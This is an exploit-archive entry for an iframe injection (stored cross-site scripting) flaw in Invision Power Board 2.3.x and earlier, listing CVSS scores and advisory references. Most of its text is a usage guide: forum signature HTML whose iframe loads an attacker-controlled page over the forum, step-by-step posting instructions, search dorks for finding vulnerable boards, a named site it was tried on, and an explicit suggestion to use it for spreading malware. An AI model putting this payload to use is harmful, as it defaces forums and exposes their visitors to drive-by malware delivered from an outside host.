Invision Power Board <=2.3.x iFrame Vuln

2009.04.01
Credit: shaheemirza
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

####################################################### Tested On: http://www.abarjigs.com/forum/ Effected on:Invision Power Board <=2.3.x Type:Signature With iFrame Discovered By:CYBER.DARK.HIMU (SHAHEE_MIRZA) Google: "style designed by Soi" or "Powered by IP.Board 2.3.1" Mail: cyber.dark.himu (at) gmail (dot) com [email concealed],shaheemirza (at) gmail (dot) com [email concealed] ####################################################### HI TO ALL. HOW TO USE THIS VULN? ANSWERE IS BELOW>>>>>>> 1.REG WITH VICTIM FORUM 2.GO TO USER CONTROL PANEL 3.EDIT YOUR SIGNATURE ByTHIS CODE Code: Select all <html> <head> <title>HACKED BY YOUR-NAME</title> </head> <body> <div id="iFrame1" style="position:absolute; left:0px; top:0px; z-index:0"> <iframe name="iFrame1" width=1024 height=3186 src="http://YOUR-SITE/YOUR-PATH/YOUR.html" scrolling="no" frameborder="0"></iframe> </div> </body> </html> 4.AFTER THAT U WILL SEE ALL THE PAGE IS COVERED BY YOUR PAGE 5.GO ANY TOPIC AND POST ANYTHING. 6.AFTER THAT SEE "THE BOOM" ########################################################## ######U CAN USE IT FOR SPREADING MALWARE#################

References:

http://xforce.iss.net/xforce/xfdb/41502
http://www.securityfocus.com/bid/28466
http://www.securityfocus.com/archive/1/archive/1/490115/100/0/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top